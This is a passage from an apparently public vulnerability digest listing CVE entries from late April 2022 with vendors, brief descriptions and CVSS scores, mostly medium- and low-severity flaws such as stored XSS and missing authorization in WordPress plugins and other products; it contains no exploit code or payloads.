2022-04-26 | CVE-2021-36867 | Psychological Tests Quizzes Project | Unspecified vulnerability in Psychological Tests & Quizzes Project Psychological Tests & Quizzes 0.21.19 Stored Cross-Site Scripting (XSS) vulnerability in Alexander Ustimenko's Psychological tests & quizzes plugin <= 0.21.19 on WordPress possible for users with contributor or higher user rights. | 5.4 |
2022-04-26 | CVE-2022-27854 | Psychological Tests Quizzes Project | Unspecified vulnerability in Psychological Tests & Quizzes Project Psychological Tests & Quizzes 0.21.19 Stored Cross-Site Scripting (XSS) vulnerability in Alexander Ustimenko's Psychological tests & quizzes plugin <= 0.21.19 on WordPress possible for users with contributor or higher role via &wpt_test_page_submit_button_caption parameter. | 5.4 |
2022-04-26 | CVE-2022-1173 | Getgrav | Cross-site Scripting vulnerability in Getgrav Grav stored xss in GitHub repository getgrav/grav prior to 1.7.33. | 5.4 |
2022-04-25 | CVE-2022-0398 | Caseproof | Missing Authorization vulnerability in Caseproof Thirstyaffiliates Affiliate Link Manager The ThirstyAffiliates Affiliate Link Manager WordPress plugin before 3.10.5 does not have authorisation and CSRF checks when creating affiliate links, which could allow any authenticated user, such as subscriber to create arbitrary affiliate links, which could then be used to redirect users to an arbitrary website | 5.4 |
2022-04-25 | CVE-2022-1152 | Menubar | Unspecified vulnerability in Menubar The Menubar WordPress plugin before 5.8 does not sanitise and escape the command parameter before outputting it back in the response via the menubar AJAX action (available to any authenticated users), leading to a Reflected Cross-Site Scripting | 5.4 |
2022-04-25 | CVE-2022-27428 | Gallerycms Project | Cross-site Scripting vulnerability in Gallerycms Project Gallerycms 2.0 A stored cross-site scripting (XSS) vulnerability in /index.php/album/add of GalleryCMS v2.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the album_name parameter. | 5.4 |
2022-04-25 | CVE-2022-1457 | Facturascripts | Cross-site Scripting vulnerability in Facturascripts Store XSS in title parameter executing at EditUser Page & EditProducto page in GitHub repository neorazorx/facturascripts prior to 2022.04. | 5.4 |
2022-04-25 | CVE-2022-1458 | Open EMR | Cross-site Scripting vulnerability in Open-Emr Openemr Stored XSS Leads To Session Hijacking in GitHub repository openemr/openemr prior to 6.1.0.1. | 5.4 |
2022-04-28 | CVE-2022-29869 | Samba Fedoraproject Debian | Information Exposure Through Log Files vulnerability in multiple products cifs-utils through 6.14, with verbose logging, can cause an information leak when a file contains = (equal sign) characters but is not a valid credentials file. | 5.3 |
2022-04-27 | CVE-2022-22276 | Sonicwall | Information Exposure vulnerability in Sonicwall products A vulnerability in SonicOS SNMP service resulting exposure of sensitive information to an unauthorized user. | 5.3 |
2022-04-27 | CVE-2022-22277 | Sonicwall | Information Exposure vulnerability in Sonicwall products A vulnerability in SonicOS SNMP service resulting exposure of Wireless Access Point sensitive information in cleartext. | 5.3 |
2022-04-27 | CVE-2021-34587 | IBM Bender | Out-of-bounds Write vulnerability in multiple products In Bender/ebee Charge Controllers in multiple versions a long URL could lead to webserver crash. | 5.3 |
2022-04-27 | CVE-2021-38939 | IBM | Information Exposure Through Log Files vulnerability in IBM Qradar Security Information and Event Manager IBM QRadar SIEM 7.3, 7.4, and 7.5 stores potentially sensitive information in log files that could be read by an user with access to creating domains. | 5.3 |
2022-04-27 | CVE-2021-46423 | Telesquare | Unspecified vulnerability in Telesquare Tlr-2005Ksh Firmware 1.0.0 Telesquare TLR-2005KSH 1.0.0 is affected by an unauthenticated file download vulnerability that allows a remote attacker to download a full configuration file. | 5.3 |
2022-04-27 | CVE-2021-41041 | Eclipse Oracle | Unchecked Return Value vulnerability in multiple products In Eclipse Openj9 before version 0.32.0, Java 8 & 11 fail to throw the exception captured during bytecode verification when verification is triggered by a MethodHandle invocation, allowing unverified methods to be invoked using MethodHandles. | 5.3 |
2022-04-25 | CVE-2022-24880 | Flask Session Captcha Project | Improper Check for Unusual or Exceptional Conditions vulnerability in Flask-Session-Captcha Project Flask-Session-Captcha flask-session-captcha is a package which allows users to extend Flask by adding an image based captcha stored in a server side session. | 5.3 |
2022-04-27 | CVE-2022-28197 | Nvidia | Integer Overflow or Wraparound vulnerability in Nvidia Jetson Linux NVIDIA Jetson Linux Driver Package contains a vulnerability in the Cboot ext4_mount function, where Insufficient validation of untrusted data may allow a highly privileged local attacker to cause an integer overflow. | 5.0 |
2022-04-28 | CVE-2022-24898 | Xwiki | XXE vulnerability in Xwiki Commons org.xwiki.commons:xwiki-commons-xml is a common module used by other XWiki top level projects. | 4.9 |
2022-04-28 | CVE-2021-43930 | Smartptt | Unspecified vulnerability in Smartptt Scada 1.1 Elcomplus SmartPTT is vulnerable as the backup and restore system does not adequately validate download requests, enabling malicious users to perform path traversal attacks and potentially download arbitrary files from the system. | 4.9 |
2022-04-28 | CVE-2022-28117 | Naviwebs | Server-Side Request Forgery (SSRF) vulnerability in Naviwebs Navigate CMS 2.9.4 A Server-Side Request Forgery (SSRF) in feed_parser class of Navigate CMS v2.9.4 allows remote attackers to force the application to make arbitrary requests via injection of arbitrary URLs into the feed parameter. | 4.9 |
2022-04-25 | CVE-2022-0477 | Gitlab | Unspecified vulnerability in Gitlab An issue has been discovered in GitLab affecting all versions starting from 11.9 before 14.5.4, all versions starting from 14.6.0 before 14.6.4, all versions starting from 14.7.0 before 14.7.1. | 4.9 |
2022-04-30 | CVE-2021-41993 | Pingidentity | Use of Insufficiently Random Values vulnerability in Pingidentity Pingid and Pingid Windows Login A misconfiguration of RSA in PingID Android app prior to 1.19 is vulnerable to pre-computed dictionary attacks, leading to an offline MFA bypass when using PingID Windows Login. | 4.8 |
2022-04-30 | CVE-2021-41994 | Pingidentity | Use of Insufficiently Random Values vulnerability in Pingidentity Pingid and Pingid Windows Login A misconfiguration of RSA in PingID iOS app prior to 1.19 is vulnerable to pre-computed dictionary attacks, leading to an offline MFA bypass when using PingID Windows Login. | 4.8 |
2022-04-28 | CVE-2022-29811 | Jetbrains | Cross-site Scripting vulnerability in Jetbrains HUB In JetBrains Hub before 2022.1.14638 stored XSS via project icon was possible. | 4.8 |
2022-04-27 | CVE-2022-22345 | IBM | Cross-site Scripting vulnerability in IBM Qradar Security Information and Event Manager IBM QRadar 7.3, 7.4, and 7.5 is vulnerable to cross-site scripting. | 4.8 |
2022-04-25 | CVE-2022-29418 | Night Mode Project | Unspecified vulnerability in Night Mode Project Night Mode Authenticated (admin user role) Persistent Cross-Site Scripting (XSS) in Mark Daniels Night Mode plugin <= 1.0.0 on WordPress via vulnerable parameters: &ntmode_page_setting[enable-me], &ntmode_page_setting[bg-color], &ntmode_page_setting[txt-color], &ntmode_page_setting[anc_color]. | 4.8 |
2022-04-25 | CVE-2022-0876 | Wpdevart | Unspecified vulnerability in Wpdevart Social Comments The Social comments by WpDevArt WordPress plugin before 2.5.0 does not sanitise and escape its settings, allowing high privilege users such as admin to perform cross-Site Scripting attacks even when unfiltered_html is disallowed | 4.8 |
2022-04-25 | CVE-2022-1027 | Minioragne | Unspecified vulnerability in Minioragne Page Restriction The Page Restriction WordPress (WP) WordPress plugin before 1.2.7 allows bad actors with administrator privileges to the settings page to inject Javascript code to its settings leading to stored Cross-Site Scripting that will only affect administrator users. | 4.8 |
2022-04-25 | CVE-2022-1094 | Anmari | Unspecified vulnerability in Anmari AMR Users The amr users WordPress plugin before 4.59.4 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed | 4.8 |
2022-04-25 | CVE-2022-1153 | Layslider | Unspecified vulnerability in Layslider The LayerSlider WordPress plugin before 7.1.2 does not sanitise and escape Project's slug before outputting it back in various place, which could allow high privilege users such as admin to perform Cross-Site Scripting attacks even when the unfiltered_html is disallowed | 4.8 |
2022-04-25 | CVE-2022-1156 | Books Papers Project | Cross-site Scripting vulnerability in Books & Papers Project Books & Papers The Books & Papers WordPress plugin through 0.20210223 does not escape its Custom DB prefix settings, allowing high privilege users to perform Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed | 4.8 |
2022-04-25 | CVE-2022-1228 | Opensea Project | Unspecified vulnerability in Opensea Project Opeansea The Opensea WordPress plugin before 1.0.3 does not sanitize and escape some of its settings, like its "Referer address" field, which could allow high privilege users to perform Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed. | 4.8 |
2022-04-25 | CVE-2022-1396 | Donorbox | Unspecified vulnerability in Donorbox The Donorbox WordPress plugin before 7.1.7 does not sanitise and escape its Campaign URL settings before outputting it in an attribute, leading to a Stored Cross-Site Scripting issue even when the unfiltered_html capability is disallowed | 4.8 |
2022-04-27 | CVE-2022-24372 | Linksys | Link Following vulnerability in Linksys Mr9600 Firmware Linksys MR9600 devices before 2.0.5 allow attackers to read arbitrary files via a symbolic link to the root directory of a NAS SMB share. | 4.6 |
2022-04-27 | CVE-2022-28196 | Nvidia | Out-of-bounds Write vulnerability in Nvidia Jetson Linux NVIDIA Jetson Linux Driver Package contains a vulnerability in the Cboot blob_decompress function, where insufficient validation of untrusted data may allow a local attacker with elevated privileges to cause a memory buffer overflow, which may lead to code execution, limited loss of Integrity, and limited denial of service. | 4.6 |
2022-04-29 | CVE-2022-0984 | Moodle Fedoraproject Redhat | Incorrect Authorization vulnerability in multiple products Users with the capability to configure badge criteria (teachers and managers by default) were able to configure course badges with profile field criteria, which should only be available for site badges. | 4.3 |
2022-04-29 | CVE-2022-0985 | Moodle | Incorrect Authorization vulnerability in Moodle Insufficient capability checks could allow users with the moodle/site:uploadusers capability to delete users, without having the necessary moodle/user:delete capability. | 4.3 |
2022-04-29 | CVE-2022-29903 | Mediawiki | Cross-Site Request Forgery (CSRF) vulnerability in Mediawiki The Private Domains extension for MediaWiki through 1.37.2 (before 1ad65d4c1c199b375ea80988d99ab51ae068f766) allows CSRF for editing pages that store the extension's configuration. | 4.3 |
2022-04-29 | CVE-2022-29905 | Mediawiki | Cross-Site Request Forgery (CSRF) vulnerability in Mediawiki The FanBoxes extension for MediaWiki through 1.37.2 (before 027ffb0b9d6fe0d823810cf03f5b562a212162d4) allows Special:UserBoxes CSRF. | 4.3 |
2022-04-27 | CVE-2021-29776 | IBM | Unspecified vulnerability in IBM Qradar Security Information and Event Manager IBM QRadar SIEM 7.3, 7.4, and 7.5 could allow an authenticated user to obtain sensitive information from another user's dashboard providing the dashboard ID of that user. | 4.3 |
2022-04-27 | CVE-2021-38874 | IBM | Unspecified vulnerability in IBM Qradar Security Information and Event Manager IBM QRadar SIEM 7.3, 7.4, and 7.5 allows for users to access information across tenant and domain boundaries in some situations. | 4.3 |
2022-04-27 | CVE-2022-24888 | Nextcloud | Unspecified vulnerability in Nextcloud Server Nextcloud Server is the file server software for Nextcloud, a self-hosted productivity platform. | 4.3 |
2022-04-27 | CVE-2022-24889 | Nextcloud | Unspecified vulnerability in Nextcloud Server Nextcloud Server is the file server software for Nextcloud, a self-hosted productivity platform. | 4.3 |
2022-04-27 | CVE-2022-27331 | Zammad | Exposure of Resource to Wrong Sphere vulnerability in Zammad An access control issue in Zammad v5.0.3 broadcasts administrative configuration changes to all users who have an active application instance, including settings that should only be visible to authenticated users. | 4.3 |
2022-04-26 | CVE-2022-24866 | Discourse | Information Exposure vulnerability in Discourse Assign Discourse Assign is a plugin for assigning users to a topic in Discourse, an open-source messaging platform. | 4.3 |
2022-04-25 | CVE-2022-29417 | Shortpixel | Unspecified vulnerability in Shortpixel Adaptive Images Plugin Settings Update vulnerability in ShortPixel's ShortPixel Adaptive Images plugin <= 3.3.1 at WordPress allows an attacker with a low user role like a subscriber or higher to change the plugin settings. | 4.3 |
2022-04-25 | CVE-2021-24800 | Designwall | Authorization Bypass Through User-Controlled Key vulnerability in Designwall DW Question & Answer The DW Question & Answer Pro WordPress plugin through 1.3.4 does not check that the comment to edit belongs to the user making the request, allowing any user to edit other comments. | 4.3 |
2022-04-25 | CVE-2021-24805 | Designwall | Unspecified vulnerability in Designwall DW Question & Answer The DW Question & Answer Pro WordPress plugin through 1.3.4 does not properly check for CSRF in some of its functions, allowing attackers to make logged in users perform unwanted actions, such as update a comment or a question status. | 4.3 |
2022-04-25 | CVE-2022-0287 | Mycred | Missing Authorization vulnerability in Mycred The myCred WordPress plugin before 2.4.4.1 does not have any authorisation in place in its mycred-tools-select-user AJAX action, allowing any authenticated user, such as subscriber to call and retrieve all email addresses from the blog | 4.3 |
2022-04-25 | CVE-2022-0363 | Mycred | Missing Authorization vulnerability in Mycred The myCred WordPress plugin before 2.4.3.1 does not have any authorisation and CSRF checks in the mycred-tools-import-export AJAX action, allowing any authenticated users, such as subscribers, to call it and import mycred setup, thus creating badges, managing points or creating arbitrary posts. | 4.3 |
2022-04-25 | CVE-2022-0634 | Caseproof | Missing Authorization vulnerability in Caseproof Thirstyaffiliates Affiliate Link Manager The ThirstyAffiliates WordPress plugin before 3.10.5 lacks authorization checks in the ta_insert_external_image action, allowing a low-privilege user (with a role as low as Subscriber) to add an image from an external URL to an affiliate link. | 4.3 |
2022-04-25 | CVE-2022-1092 | Mycred | Missing Authorization vulnerability in Mycred The myCred WordPress plugin before 2.4.3.1 does not have authorisation and CSRF checks in its mycred-tools-import-export AJAX action, allowing any authenticated user to call and and retrieve the list of email address present in the blog | 4.3 |
8 Low Vulnerabilities
DATE | CVE | VENDOR | VULNERABILITY | CVSS |
---|---|---|---|---|
2022-04-27 | CVE-2021-25266 | Sophos | Insecure Storage of Sensitive Information vulnerability in Sophos Authenticator and Intercept X An insecure data storage vulnerability allows a physical attacker with root privileges to retrieve TOTP secret keys from unlocked phones in Sophos Authenticator for Android version 3.4 and older, and Intercept X for Mobile (Android) before version 9.7.3495. | 3.9 |
2022-04-27 | CVE-2022-24886 | Nextcloud | Incorrect Permission Assignment for Critical Resource vulnerability in Nextcloud Nextcloud Android app is the Android client for Nextcloud, a self-hosted productivity platform. | 3.8 |
2022-05-01 | CVE-2022-21149 | S Cart | Cross-site Scripting vulnerability in S-Cart The package s-cart/s-cart before 6.9; the package s-cart/core before 6.9 are vulnerable to Cross-site Scripting (XSS) which can lead to cookie stealing of any victim that visits the affected URL so the attacker can gain unauthorized access to that user's account through the stolen cookie. | 3.5 |
2022-04-28 | CVE-2022-29820 | Jetbrains | Exposure of Resource to Wrong Sphere vulnerability in Jetbrains Pycharm In JetBrains PyCharm before 2022.1 exposure of the debugger port to the internal network was possible | 3.5 |
2022-04-29 | CVE-2022-1249 | Pesign Project | NULL Pointer Dereference vulnerability in Pesign Project Pesign A NULL pointer dereference flaw was found in pesign's cms_set_pw_data() function of the cms_common.c file. | 3.3 |
2022-04-28 | CVE-2022-29816 | Jetbrains | Cross-site Scripting vulnerability in Jetbrains Intellij Idea In JetBrains IntelliJ IDEA before 2022.1 HTML injection into IDE messages was possible | 3.2 |
2022-04-27 | CVE-2022-24885 | Nextcloud | Improper Authentication vulnerability in Nextcloud Nextcloud Android app is the Android client for Nextcloud, a self-hosted productivity platform. | 2.4 |
2022-04-28 | CVE-2022-29812 | Jetbrains | Unspecified vulnerability in Jetbrains Intellij Idea In JetBrains IntelliJ IDEA before 2022.1 notification mechanisms about using Unicode directionality formatting characters were insufficient | 2.3 |